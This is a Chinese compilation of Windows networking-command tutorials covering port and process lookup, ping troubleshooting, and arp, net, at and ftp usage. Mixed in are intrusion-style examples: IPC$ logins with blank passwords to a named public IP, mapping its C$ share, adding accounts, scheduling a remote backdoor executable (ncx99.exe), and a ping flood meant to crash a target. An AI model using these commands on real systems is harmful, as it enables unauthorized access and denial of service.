Windows中要查看系统端口,可以使用netstat命令,点击开始---运行---键入cmd,打开命令提示符窗口,在命令提示符状态下键入“netstat -an”,按下回车键后就可以看到以数字形式显示的TCP和UDP连接的端口号及状态。
如何关闭端口:
在默认的情况下,有很多不安全的或没有什么用的端口是开启的
比如关闭SMTP服务的25端口,可以这样做:打开控制面板----管理工具----服务,接着在打开的服务窗口中找到并双击“Simple Mail TransferProtocol (SMTP)”服务,单击“停止”按钮来停止该服务,然后在“启动类型”中选择“已禁用”,最后单击“确定”按钮即可。这样,关闭了SMTP服务就相当于关闭了对应的端口。
还有种方法就是直接打开系统盘C:\WINDOWS\SYSTEM32\drivers\etc目录下的services文件,用记事本打开,你可以看到自己开放的所有端口,如果想关掉此端口,只要在前面加上“#”号就可以了。
补:netstat命令用法:
命令格式:Netstat -a -e -n -o-s
-a 表示显示所有活动的TCP连接以及计算机监听的TCP和UDP端口。
-e 表示显示以太网发送和接收的字节数、数据包数等。
-n 表示只以数字形式显示所有活动的TCP连接的地址和端口号。
-o 表示显示活动的TCP连接并包括每个连接的进程ID(PID)。
-s 表示按协议显示各种连接的统计信息,包括端口号
【如何查看系统端口 与进程 的关联】
一、根据进程查端口号
键入“tasklist”命令:列出系统正在运行的进程列表,把你要查的进程所对应的“PID”号记下或复制。
说明:相同的进程每次运行的“PID”号一般都不会相同,所以一旦该进程重启后,该“PID”号就会改变,这就需要重新查看。
再键入“netstat -ano
findstr 1140”命令
“findstr 1140”表示查找进程PID为“1140”的TCP连接以及TCP、UDP端口的侦听情况
可用 netstat/? 查看netstat的参数意义
二、根据端口号查进程
输入“netstat-ano”命令,列出系统当前的端口列表
再输入“tasklist/fi ″PID eq 788 ″
788 为进程PID
三、查出进程对应的程序
下面的操作就需要用到Windows2000(Server或Professional版都可以)安装光盘中的一个工具。
首先在安装光盘的“SupportTools”目录下,用解压软件打开“support.cab”压缩包,找到“tlist.exe”文件,将此文件释放到任一目录,如“D:Support”。然后在命令提示符窗口中切换到此目录,运行“tlist.exe”命令,把要查的进程对应的PID号记下或复制(第一列就是进程的PID号),然后继续输入“tlist.exe 2012”命令(你输入的时候,需要将刚才记下的PID号替换掉这里的2012),“CmdLine ”后面显示的就是该进程对应的软件所在的目录。
除此之外,返回信息中还列出了该进程所调用的文件,得到了这些信息就可以很容易查出进程对应的程序了。
假如想关闭某个进程,可把该进程的PID号记下,在命令提符下输入“taskkill/pid 2400”
2400是PID号)就可以将PID号为2400的进程关闭,如果要强制关闭该进程,只须在这条命令的后面加个“/f”参数即可。
查看系统端口占用情况
输入netstat -ano 即可看到所有连接的PID 之后在任务管理器中找到这个PID所对应的程序如果任务管理器中没有PID这一项,可以在任务管理器中选"查看"-"选择列"
经常,我们在启动应用的时候发现系统需要的端口被别的程序占用,如何知道谁占有了需要的端口,很多人都比较头疼,下面就介绍一种非常简单的方法,希望对大家有用
假如我们需要确定谁占用了9050端口
1、Windows平台
在windows命令行窗口下执行:
C:\>netstat -aon|findstr"9050"
TCP 127.0.0.1:9050 0.0.0.0:0 LISTENING 2016
看到了吗,端口被进程号为2016的进程占用,继续执行下面命令:
C:\>tasklist | findstr "2016"tor.exe
2016 Console 0 16,064 K这样就找到占用此端口的程序了..
Windows 自带网络小工具介绍
网络工具多多,但精品甚少,我们不必舍近求远,所以先把 Windows 自己带的几个网络工具给大家做一下介绍。需要指出的是,这些工具都在 Windows 的目录中,别再问我到哪里去找了!不特殊说明的话,这里的 Windows 是指 Windows98!
1 、 PING.EXE ping 只有在安装了 TCP/IP 协议以后才可以使用 . 该命令主要是用来检查网络是否能够连通。它的使用格式是在命令提示符下键入: ping IP 地址或主机名 执行结果显示响应时间,重复执行这个命令,你可以发现 ping 报告的响应时间是不同的,这主要取决于网络的繁忙程度。 ping 命令后还可跟很多参数,你可以键入 ping 后回车其中会有很详细的说明。如果用户的电脑不能正常联网,可以使用 ping 命令来进行故障排除: 作用一:探测本地的计算机是否通过网络和指定 IP 地址的计算机相连接;用法: Ping 127.0.0.1 回车 ping 202.96.210.190 <enter> 它可以用来检测局域网里各电脑是否相连。 说明:若看到“ Reply from .... ”说明相连;若看到“ Request time out ”说明没相连接。
作用二:根据域名获得 IP 地址,用法: Ping www.microsoft.com 回车 说明:看到的 Reply from 的 xxx.xxx.xxx.xxx 就是 www.microsoft.com 对应的 IP 地址. ( 1 )、网络管理员可在服务器上使用 ping 命令 ping 用户机,如果成功,接着在用户端对服务器执行 ping 命令,如果也成功,则说明这一网络没有故障。 ( 2 )、如果网络管理员的 ping 命令执行成功而用户的 ping 命令执行不成功,则故障原因很可能是用户端的网络系统配置文件有问题。 ( 3 )、如果网络管理员和用户的 ping 命令都失败了,这时可注意 ping 命令显示的出错信息,这种出错信息通常分为三种情况: ① unknown host (不知名主机),这种出错信息的意思是该台电脑的名字不能被 DNS 服务器转换成 IP 地址。网络故障可能为 DNS 服务器有故障,或者其名字不正确,或者服务器与客户机之间的通信线路出现了故障。 ② network unreachable (网络不能到达),这是用户电脑没有到达服务器的路由,可用 netstat -rn 检查路由表来确定路由配置情况。 ③ no answer (无响应),服务器没有响应。这种故障说明用户电脑有一条到达服务器的路由,但却接收不到它发给服务器发来的任何信息。这种故障的原因可能是 : 服务器没有工作,或者用户电脑或服务器网络配置不正确。 作用三:根据 IP 地址获取域名,用法: Ping -a xxx.xxx.xxx.xxx 说明:看到的 Ping xyz [xxx.xxx.xxx.xxx]... 的 xyz 就是 IP 对应的域名。 2 、 IPCONFIG.EXE ( Windows 95 里叫 WINIPCFG.EXE ) 只要运行 IPCONFIG.EXE 就能看到我自己的 IP 地址了 该工具主要展示了两条信息, IP 配置信息和 IP 配置参数,它能报告出你机器中的拨号网络适配器和以太网卡的信息,以下给出了一个拨号网络适配器的部分信息:
Description (描述): PPP Adapater (点对点数据传输协议)
IP Address ( IP 地址): 202.96.168.10 (动态 IP 地址)
Subnet Mask (子网掩码): 255.255.255.255 (用于识别是否在同一局域网内)
Default Gateway (默认网关): 202.96.168.10 (沟通不同网络的接点)
DNS Server (域名服务器): 202.96.199.162 (提供域名到 IP 的查询服务)
显示全部信息的用法为: IPCONFIG.EXE -all 回车
3 、 NETSTAT.EXE
该工具显示了您的计算机上的 TCP 连接表、 UDP 监听者表以及 IP 协议统计。通常你可以通过这些信息发现你机器上正在打开的端口和服务,利用这你可以检查你的机器上是否有木马哦!不过这需要有 TCP/IP 的基本常识。同时你还可以看到你的机器正在和那些 IP 地址以 TCP 、 UDP 或其他协议进行连接的状态。
显示全部信息的用法为: NETSTAT.EXE -a 回车
4 、 ROUTE.EXE
该工具显示了您的机器 IP 的路由表,主要显示这几个方面的信息:目标地址、网络掩码、网关、本地 IP 地址和公制。
显示全部信息的用法为: ROUTR.EXE print 回车
5 、 ARP.EXE 该工具用于查看和处理 ARP 缓存, ARP 是名字解析协议的意思,负责把一个 IP 地址解析成一个物理性的 MAC 地址。 APR 可以设置 IP 地址和网卡 MAC 地址的捆绑,其主要参数作用是: - s 设置 IP 地址与网卡 MAC 地址的捆绑。 - d 取消 IP 地址与网卡 MAC 地址的捆绑。 - a 显示 P 地址与网卡 MAC 地址的捆绑情况。 例如,计算机的 IP 地址为 192.168.110.23 ,网卡的 MAC 地址为 00 - 05 - 5d - 04 - 63 - 69 在代理服务器运行: arp –s 192.168.110.23 00 - 05 - 5d - 04 - 63 - 69 这样就将该机的静态 IP 地址 192.168.110.23 和网卡的 MAC 地址 00 - 05 - 5d - 04 - 63 - 69 捆绑在一起了。 显示全部信息的用法为: ARP -a 回车 ,可以显示局域网内所有 IP 地址和网卡 MAC 地址的对应情况。如果事先将局域网内所有 IP 地址和 MAC 地址的对应关系机记录下来(工具 TCP NetView 可以列出一个网段内所有计算机的 IP 地址、 MAC 地址、计算机名和计算机说明,并且提供了将这个对应关系导出到 txt 文本文件的功能),就可以用 ”arp –a” 命令与之比较,可以查出 IP 地址是否被盗。 6 、 NBTSTAT.EXE
该工具主要用于查看当前基于 NETBIOS 的 TCP/IP 连接状态,通过该工具你可以获得远程或本地机器的组名和机器名。
用法为: NBTSTAT -a 域名 或 NBTSTAT -A IP 地址 回车
以上只是对这些常见但很有用却容易被大家忽略的网络小工具做了简单的介绍,其实它们的功能还是非常强大的,需要大家去理解和发掘,不过这的确需要一些网络的基础知识做依托。 三、使用 PING 判断 TCP/IP 网络故障 在网络管理中, PING 时使用的最频繁的命令之一,学会使用 PING 来判断 TCP/IP 网络故障是一个网络用户应具备的技能。而且,在遇到网络不通的故障时, PING 命令的使用顺序(即故障的诊断排查顺序)也有一定的讲究。具体的诊断顺序如下: 1 、 PING 127.0.0.1 PING 127.0.0.1 是本地循坏地址,如果该地址无法 PING 通,则表明本机 TCP/IP 协议不能正常工作;如果 PING 通了该地址,证明 TCP/IP 协议正常,则进入下一个步骤继续诊断。 2 、 PING 本机的 IP 地址 使用 IPCONFIG 命令可以查看本机的 IP 地址, PING 该 IP 地址,如果 PING 通,表明网络适配器(网卡或者 MODEM )工作正常,则需要进入下一个步骤继续检查;反之则是网络适配器出现故障。 3 、 PING 同网段计算机的 IP 地址 PING 一台同网段计算机的 IP 地址, PING 不通则表明网络线路出现故障。如果网络中还包含有路由器,则应当先 PING 路由器在本网段端口的 IP 地址,不通则此段线路有问题,通则再 PING 路由器在目标计算机所在网段的端口 IP 地址,不通则是路由出现故障。如果通,最后再 PING 目标机的 IP 地址。 4 、 PING 网址 如果要检测的是一个带 DNS 服务的网络(比如 INTERNET ),并且能 PING 通了目标计算机的 IP 地址后,仍然无法连接到该机,则可以 PING 该机的网络名(域名),比如: PING www.sina.com ,正常情况下会出现网址所指向的 IP 地址,这表明本机的 DNS 设置正确而且 DNS 服务工作正常,反之就可能是其中之一出现了故障;同样也可以通过 PING 计算机名检测 WIN 解析的故障( WINS 是将计算机名解析到 IP 地址的服务)。 四、计算机网络实用命令 1、ping命令 在 DOS 底下,运行 ping 既可!
如: ping 192.168.0.1 检测主机有没有连接到网上。
-a 将目标的机器标识转换为 ip 地址
-t 若使用者不人为中断会不断的 ping 下去
-c count 要求 ping 命令连续发送数据包,直到发出并接收到 count 请求
-d 为使用的套接字打开调试状态
-f 是一种快速方式 ping 。使得 ping 输出数据包的速度和数据包从远程主机返回一样快,或者更快,达到每秒 100 次。在这种方式下,每个请求用一个句点表示。对于每一个响应打印一个空格键。
-i seconds 在两次数据包发送之间间隔一定的秒数。不能同 -f 一起使用。
-n 只使用数字方式。在一般情况下 ping 会试图把 IP 地址转换成主机名。这个选项要求 ping 打印 IP 地址而不去查找用符号表示的名字。如果由于某种原因无法使用本地 DNS 服务器这个选项就很重要了。
-p pattern 拥护可以通过这个选项标识 16 pad 字节,把这些字节加入数据包中。当在网络中诊断与数据有关的错误时这个选项就非常有用。
-q 使 ping 只在开始和结束时打印一些概要信息。
-R 把 ICMP RECORD-ROUTE 选项加入到 ECHO_REQUEST 数据包中,要求在数据包中记录路由,这样当数据返回时 ping 就可以把路由信息打印出来。每个数据包只能记录 9 个路由节点。许多主机忽略或者放弃这个选项。
-r 使 ping 命令用于发送数据包的正常路由表。
-s packetsize 使用户能够标识出要发送数据的字节数。缺省是 56 个字符,再加上 8 个字节的 ICMP 数据头,共 64 个 ICMP 数据字节。
-v 使 ping 处于 verbose 方式。它要 ping 命令除了打印 ECHO-RESPONSE 数据包之外,还打印其它所有返回的 ICMP 数据包。 ★得到该网站的IP地址: ping 网站域名 ★得到该网站的域名: ping -a 网站IP地址 ★得到该计算机的IP地址(注:若有防火墙,可能ping不出): ping 计算机主机名 ★向目标计算机不停地发送500字节的数据包,同时要求目标计算机返回同样的数据包,这样可能目标计算机挂起来或重新启动: ping -l 500 -t IP 2、tracert命令 ★显示从本地计算机到该域名的服务器所经过的计算机: tracert 网站域名 3、nbtstat命令 ★使用远程计算机的名称列出其名称表: nbtstat -a IP 4、netstat命令 如:你想知道对方能 IP 地址,直接在 dos 运行: netstat -n
-A 显示任何关联的协议控制块的地址。主要用于调试
-a 显示所有套接字的状态。在一般情况下不显示与服务器进程相关联的套接字
-i 显示自动配置接口的状态。那些在系统初始引导后配置的接口状态不在输出之列
-m 打印网络存储器的使用情况
-n 打印实际地址,而不是对地址的解释或者显示主机,网络名之类的符号
-r 打印路由选择表
-f address -family 对于给出名字的地址簇打印统计数字和控制块信息。到目前为止,唯一支持的地址簇是 inet
-I interface 只打印给出名字的接口状态
-p protocol-name 只打印给出名字的协议的统计数字和协议控制块信息
-s 打印每个协议的统计数字
-t 在输出显示中用时间信息代替队列长度信息。 netstat 命令的列标题
Name 接口的名字
Mtu 接口的最大传输单位
Net/Dest 接口所在的网络
Address 接口的 IP 地址
Ipkts 接收到的数据包数目
Ierrs 接收到时已损坏的数据包数目
Opkts 发送的数据包数目
Oeers 发送时已损坏的数据包数目
Collisions 由这个接口所记录的网络冲突数目 ★显示出计算机当前所开放的端口,并显示出与当前计算机相连接的IP地址: netstat -a ★显示本机IP端口与远程IP端口的连接: netstat -n 5、net命令 (windows9x下的命令没有windows2000下那么强大,没有扩展性。) 鉴于 Net 的命令参数太多,现只介绍与网络有关的一些参数用法
(1)NET VIEW (使用前提:必须建立 IPC$ 连接) 作 用:显示域列表、计算机列表或指定计算机的共享资源列表。
命令格式: net view [\\computername | /domain[:domainname]]
参数介绍:
(1) 键入不带参数的 net view 显示当前域的计算机列表。
(2)\\computername 指定要查看其共享资源的计算机名。
(3)/domain[:domainname] 指定要查看其可用计算机的域。
简单事例: (1)net view \\XKY 查看 XKY 的共享资源列表。
(2)net view /domain:XKY 查看 XKY 域中的机器列表 。
(2)NET USE (使用前提:必须建立 IPC$ 连接)
作 用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。
命令格式: net use [devicename | *] [\\computername\sharename[\volume]] [password | *]] [/user:[domainname\]username] [[/delete] | [/persistent:{yes | no}]]
参数介绍:
键入不带参数的 net use 列出网络连接。
devicename 指定要连接到的资源名称或要断开的设备名称。
\\computername\sharename 服务器及共享资源的名称。
password 访问共享资源的密码。
* 提示键入密码。
/user 指定进行连接的另外一个用户。
domainname 指定另一个域。
username 指定登录的用户名。
/home 将用户连接到其宿主目录。
/delete 取消指定网络连接。
/persistent 控制永久网络连接的使用。
简单事例:
(1)net use e: \\192.168.123.20\TEMP 将 \\192.168.123.20\TEMP 目录建立为 E 盘
(2)net use e: /delete 断开连接
(3)NET TIME
作 用:使计算机的时钟与另一台计算机或域的时间同步。
命令格式: net time [\\computername | /domain[:name]] [/set]
参数介绍:
(1)\\computername 要检查或同步的服务器名。
(2)/domain[:name] 指定要与其时间同步的域。
(3)/set 使本计算机时钟与指定计算机或域的时钟同步。
下面的这 4 个参数是相关的,所以一起介绍
(4)Net Share
作 用:创建、删除或显示共享资源。
命令格式: net share sharename=drive:path [/users:number | /unlimited] [/remark:"text"]
参数介绍:
(1) 键入不带参数的 net share 显示本地计算机上所有共享资源的信息。
(2)sharename 是共享资源的网络名称。
(3)drive:path 指定共享目录的绝对路径。
(4)/users:number 设置可同时访问共享资源的最大用户数。
(5)/unlimited 不限制同时访问共享资源的用户数。
(6)/remark:"text " 添加关于资源的注释,注释文字用引号引住。
简单事例:
(1)net share mylove=c:\temp /remark:"my first share" 以 mylove 为共享名共享 C:\temp
(2)net share mylove /delete 停止共享 mylove 目录
上面介绍的是 NET 命令在 WINNT 下的基本用法 。 net use 命令:将计算与共享资源连接或断开,或者显示关于计算机连接的信息。 ★检索网络连接列表:net use ★用户名为system32,密码为ffhh与计算机61.150.115.7进行ipc$连接:
net use \\61.150.115.7\ipc$ ffhh /user:system32 ★用户名为system32,密码为空与计算机61.150.115.7进行ipc$连接:
net use \\61.150.115.7\ipc$ “” /user:system32 ★将远程计算机的C盘映射为本地为O盘: net use o:\\61.150.115.7\c$ net user 命令:添加或修改用户账户或者显示用户账户信息。 ★指定要添加、删除、修改或查看的用户账户名: net user 54hack ★添加一个用户名为ffhh,密码为12332: net user ffhh 12332 /add ★ 将用户账户添加到用户账户数据库: net user 54hack /add ★ 从用户账户数据库中删除用户账户: net user ffhh /delete ★启用guest账户: net user guest /active:yes ★禁用guest账户 : net user guest /active:no ★用户admin可以更改自己密码: net user admin /passwordchg:yes ★用户admin必须要有密码: net user admin /passwordreg:yes net view命令:显示域列表、计算机列表或者由指定计算机共享的资源。 ★列出本地机的当前域中计算机的列表: net view ★查看远程计算机的共享资源: net view \\61.153.230.130 net share命令:创建、删除或显示共享资源。 ★显示本地计算机上共享资源: net share ★启动admin&共享: net share admin$ ★停止admin&的共享: net share admin$ /delete net stop命令:停止windows2000的server服务 ★停止server服务: net stop server net start命令:启动服务或显示已启动的服务 ★启动server服务: net start server ★显示远程计算机当前的时间: net time \\61.150.115.7 6、at命令 列出指定的时间和日期在计算机上运行的已计划命令或计划命令和程序。必须正在运行计划任务才能使用at命令。 ★列出本机已计划的命令: at ★ 显示远程计算机的计划任何列表: at \\61.150.115.7 ★删除所有计划任务: at \\61.150.115.7 /delete ★当删除已计划的事件时,对系统的询问强制进行肯定的回答: at \\61.150.115.7 /delete /yes ★ 让远程计算机61.150.115.7每月2日上午02:29执行C盘下的ncx99.exe: at \\61.150.115.7 02:29 /every:2 c:\ncx99.exe 7、FTP命令(在使用FTP命令之前,必须先登录到远程计算机,才能进行一系列FTP命令的操作) ★登录到目标机: ftp 192.168.0.1 ★列出目标主机的文件目录:dir ★将本地计算机D盘下的文件ffhh.txt复制到远程计算机images目录下: put d:\ffhh.txt images\ffhh.txt ★将远程计算机上的edit.asp复制到本机D盘下: get edit.asp d:\edit.asp ★删除文件(删除远程计算机上的文件ffhh.txt):mdelete ffhh.txt ★ 创建目录(在远程计算机上创建文件夹ffhh):mkdir ffhh ★重命名文件(将远程计算机上的文件ffhh.asp重命名为web.asp): rename ffhh.asp web.asp ★退出FTP:bye 1.最基本,最常用的,测试物理网络的 PING
ping 192.168.0.8 -t ,参数-t是等待用户去中断测试
2.查看DNS、IP、Mac等
A.Win98:winipcfg
B.Win2000以上:Ipconfig/all
C.NSLOOKUP:如查看河北的DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 则将DNS改为了41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68
Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212
3.网络信使 (经常有人问的~)
Net send 计算机名/IP * (广播) 传送内容,注意不能跨网段
net stop messenger 停止信使服务,也可以在面板-服务修改
net start messenger 开始信使服务
4.探测对方对方计算机名,所在的组、域及当前用户名 (追捕的工作原理)
ping -a IP -t ,只显示NetBios名
nbtstat -a 192.168.10.146 比较全的
5.netstat -a 显示出你的计算机当前所开放的所有端口
netstat -s -e 比较详细的显示你的网络资料,包括TCP、UDP、ICMP 和 IP的统计等
6.探测arp绑定(动态和静态)列表,显示所有连接了我的计算机,显示对方IP和MAC地址
arp -a
7.在代理服务器端
捆绑IP和MAC地址,解决局域网内盗用IP!:
ARP -s 192.168.10.59 00 -50-ff-6c-08-75
解除网卡的IP与MAC地址的绑定:
arp -d 网卡IP
8.在网络邻居上隐藏你的计算机 (让人家看不见你!)
net config server /hidden:yes
net config server /hidden:no 则为开启
9.几个net命令
A.显示当前工作组服务器列表 net view,当不带选项使用本命令时,它就会显示当前域或网络上的计算机上的列表。
比如:查看这个IP上的共享资源,就可以
C:\>net view 192.168.10.8
在 192.168.10.8 的共享资源
资源共享名 类型 用途 注释
--------------------------------------
网站服务 Disk
命令成功完成。
B.查看计算机上的用户帐号列表 net user
C.查看网络链接 net use
例如:net use z: \\192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘
D.记录链接 net session
例如:
C:\>net session
计算机 用户名 客户类型 打开空闲时间
-------------------------------------------------------------------------------
\\192.168.10.110 ROME Windows 2000 2195 0 00:03:12
\\192.168.10.51 ROME Windows 2000 2195 0 00:00:39
命令成功完成。
10.路由跟踪命令
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 除了显示路由外,还提供325S的分析,计算丢失包的%
11.关于共享安全的几个命令
A.查看你机器的共享资源 net share
B.手工删除共享(可以编个bat文件,开机自运行,把共享都删了!)
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
注意$后有空格。
C.增加一个共享:
c:\net share mymovie=e:\downloads\movie /users:1
mymovie 共享成功。
同时限制链接用户数为1人。
12.在DOS行下设置静态IP
A.设置静态IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "本地链接" static IP地址 mask gateway
B.查看IP设置
interface ip>show address
Arp
显示和修改“地址解析协议 (ARP)”缓存中的项目。ARP 缓存中包含一个或多个表,它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用,则 arp 命令将显示帮助信息。
语法
arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]
参数
-a [InetAddr] [-N IfaceAddr]
显示所有接口的当前 ARP 缓存表。要显示指定 IP 地址的 ARP 缓存项,请使用带有 InetAddr 参数的 arp -a,此处的 InetAddr 代表指定的 IP 地址。要显示指定接口的 ARP 缓存表,请使用 -N IfaceAddr 参数,此处的 IfaceAddr 代表分配给指定接口的 IP 地址。-N 参数区分大小写。
-g [InetAddr] [-N IfaceAddr]
与 -a 相同。
-d InetAddr [IfaceAddr]
删除指定的 IP 地址项,此处的 InetAddr 代表 IP 地址。对于指定的接口,要删除表中的某项,请使用 IfaceAddr
参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。要删除所有项,请使用星号 (*) 通配符代替 InetAddr。
-s InetAddr EtherAddr [IfaceAddr]
向 ARP 缓存添加可将 IP 地址 InetAddr 解析成物理地址 EtherAddr 的静态项。要向指定接口的表添加静态 ARP 缓存项,请使用 IfaceAddr 参数,此处的 IfaceAddr 代表分配给该接口的 IP 地址。
/?
在命令提示符显示帮助。
注释
InetAddr 和 IfaceAddr 的 IP 地址用带圆点的十进制记数法表示。
物理地址 EtherAddr 由六个字节组成,这些字节用十六进制记数法表示并且用连字符隔开(比如,00-AA-00-4F-2A-9C)。
通过 -s 参数添加的项属于静态项,它们不会 ARP 缓存中超时。如果终止 TCP/IP 协议后再启动,这些项会被删除。要创建永久的静态 ARP 缓存项,请在批处理文件中使用适当的 arp 命令并通过“计划任务程序”在启动时运行该批处理文件。
只有当网际协议 (TCP/IP) 协议在 网络连接中安装为网络适配器属性的组件时,该命令才可用。
范例
要显示所有接口的 ARP 缓存表,可键入:
arp -a
对于指派的 IP 地址为 10.0.0.99 的接口,要显示其 ARP 缓存表,可键入:
arp -a -N 10.0.0.99
要添加将 IP 地址 10.0.0.80 解析成物理地址 00-AA-00-4F-2A-9C 的静态 ARP 缓存项,可键入:
arp -s 10.0.0.80 00-AA-00-4F-2A-9C
At
计划在指定时间和日期在计算机上运行命令和程序。at 命令只能在“计划”服务运行时使用。如果在没有参数的情况下使用,则 at 列出已计划的命令。
语法
at [\\ComputerName] [{[ID] [/delete] /delete [/yes]}]
at [[\\ComputerName] hours:minutes [/interactive] [{/every:date[,...] /next:date[,...]}] command]
参数
\\computername
指定远程计算机。如果省略该参数,则 at 计划本地计算机上的命令和程序。
ID
指定指派给已计划命令的识别码。
/delete
取消已计划的命令。如果省略了 ID,则计算机中所有已计划的命令将被取消。
/yes
删除已计划的事件时,对来自系统的所有询问都回答“是”。
hours:minutes
指定命令运行的时间。该时间用 24 小时制(即从 00:00 [午夜] 到 23:59)的 小时: 分钟格式表示。
/interactive
对于在运行 command 时登录的用户,允许 command 与该用户的桌面进行交互。
/every:
在每个星期或月的指定日期(例如,每个星期四,或每月的第三天)运行 command 命令。
date
指定运行命令的日期。可以指定一周的某日或多日(即,键入 M、T、W、Th、F、S、Su)或一个月中的某日或多日(即,键入从 1 到31 之间的数字)。用逗号分隔多个日期项。如果省略了 date,则 at 使用该月的当前日。
/next:
在下一个指定日期(比如,下一个星期四)到来时运行 command。
command
指定要运行的 Windows 命令、程序(.exe 或 .com 文件)或批处理程序(.bat 或 .cmd 文件)。当命令需要路径作为参数时,请使用绝对路径,也就是从驱动器号开始的整个路径。如果命令在远程计算机上,请指定服务器和共享名的通用命名协定 (UNC) 符号,而不是远程驱动器号。
/?
在命令提示符显示帮助。
注释
Schtasks 是功能更为强大的超集命令行计划工具,它含有 at 命令行工具中的所有功能。对于所有的命令行计划任务,都可以使用 schtasks 来替代 at。有关 schtasks 的详细信息,请参阅“相关主题”。
使用 at
使用 at 命令时,要求您必须是本地 Administrators 组的成员。
加载 Cmd.exe
在运行命令之前,At 不会自动加载 Cmd.exe (命令解释器)。如果没有运行可执行文件 (.exe),则在命令开头必须使用如下所示的方法专门加载 Cmd.exe:
cmd /c dir > c:\test.out。
查看已计划的命令
当不带命令行选项使用 at 时,计划任务会出现在类似于以下格式的表中:
Status ID Day Time Command Line
OK 1 Each F 4:30 PM net send group leads status due
OK 2 Each M 12:00 AM chkstor > check.file
OK 3 Each F 11:59 PM backup2.bat
包含标识号 (ID)
当在命令提 我想大家不会忘记Windows是从简单的DOS字符界面发展过来的。虽然我们平时在使用Windows操作系统的时候,主要是对图形界面进行操作,但是DOS命令我们仍然非常有用。 下面就让我看来看看这些命令到底有那些作用,同时学习如何使用这些命令的技巧。 一、Ping命令的使用技巧 Ping是个使用频率极高的实用程序,用于确定本地主机是否能与另一台主机交换(发送与接收)数据报。根据返回的信息,我们就可以推断TCP/IP参数是否设置得正确以及运行是否正常。需要注意的是:成功地与另一台主机进行一次或两次数 据报交换并不表示TCP/IP配置就是正确的,我们必须执行大量的本地主机与远程主机的数据报交换,才能确信TCP/IP的正确性。 简单的说,Ping就是一个测试程序,如果Ping运行正确,我们大体上就可以排除网络访问层、网卡、MODEM的输入输出线路、电缆和路由器等存在的故障,从而减小了问题的范围。但由于可以自定义所发数据报的大小及无休止的高速发送,Ping也被某些别有用心的人作为DDOS(拒绝服务攻击)的工具,例如许多大型的网站就是被黑客利用数百台可以高速接入互联网的电脑连续发送大量Ping数据报而瘫痪的。 按照缺省设置,Windows上运行的Ping命令发送4个ICMP(网间控制报文协议)回送请求,每个32字节数据,如果一切正常,我们应能得到4个回送应答。 Ping能够以毫秒为单位显示发送回送请求到返回回送应答之间的时间量。如果应答时间短,表示数据报不必通过太多的路由器或网络连接速度比较快。Ping还能显示TTL(Time To Live存在时间)值,我们可以通过TTL值推算一下数据包已经通过了多少个路由器:源地点TTL起始值(就是比返回TTL略大的一个2的乘方数)-返回时TTL值。例如,返回TTL值为119,那么可以推算数据报离开源地址的TTL起始值为128,而源地点到目标地点要通过9个路由器网段(128-119);如果返回TTL值为246,TTL起始值就是256,源地点到目标地点要通过9个路由器网段。 1、通过Ping检测网络故障的典型次序 正常情况下,当我们使用Ping命令来查找问题所在或检验网络运行情况时,我们需要使用许多Ping命令,如果所有都运行正确,我们就可以相信基本的连通性和配置参数没有问题;如果某些Ping命令出现运行故障,它也可以指明到何处去查找问题。下面就给出一个典型的检测次序及对应的可能故障: ping 127.0.0.1
这个Ping命令被送到本地计算机的IP软件,该命令永不退出该计算机。如果没有做到这一点,就表示TCP/IP的安装或运行存在某些最基本的问题。 ping 本机IP
这个命令被送到我们计算机所配置的IP地址,我们的计算机始终都应该对该Ping命令作出应答,如果没有,则表示本地配置或安装存在问题。出现此问题时,局域网用户请断开网络电缆,然后重新发送该命令。如果网线断开后本命令正确,则表示另一台计算机可能配置了相同的IP地址。 ping 局域网内其他IP
这个命令应该离开我们的计算机,经过网卡及网络电缆到达其他计算机,再返回。收到回送应答表明本地网络中的网卡和载体运行正确。但如果收到0个回送应答,那么表示子网掩码(进行子网分割时,将IP地址的网络部分与主机部分分开的代码)不正确或网卡配置错误或电缆系统有问题。 ping 网关IP
这个命令如果应答正确,表示局域网中的网关路由器正在运行并能够作出应答。 ping 远程IP
如果收到4个应答,表示成功的使用了缺省网关。对于拨号上网用户则表示能够成功的访问Internet(但不排除ISP的DNS会有问题)。 ping localhost
localhost是个作系统的网络保留名,它是127.0.0.1的别名,每太计算机都应该能够将该名字转换成该地址。如果没有做到这一带内,则表示主机文件(/Windows/host)中存在问题。 ping www.xxx.com(如www.yesky.com 天极网)
对这个域名执行Ping www.xxx.com 地址,通常是通过DNS 服务器 如果这里出现故障,则表示DNS服务器的IP地址配置不正确或DNS服务器有故障(对于拨号上网用户,某些ISP已经不需要设置DNS服务器了)。顺便说一句:我们也可以利用该命令实现域名对IP地址的转换功能。 如果上面所列出的所有Ping命令都能正常运行,那么我们对自己的计算机进行本地和远程通信的功能基本上就可以放心了。但是,这些命令的成功并不表示我们所有的网络配置都没有问题,例如,某些子网掩码错误就可能无法用这些方法检测到。 2、Ping命令的常用参数选项 ping IP –t
连续对IP地址执行Ping命令,直到被用户以Ctrl+C中断。 ping IP -l 3000
指定Ping命令中的数据长度为3000字节,而不是缺省的32字节。 ping IP –n
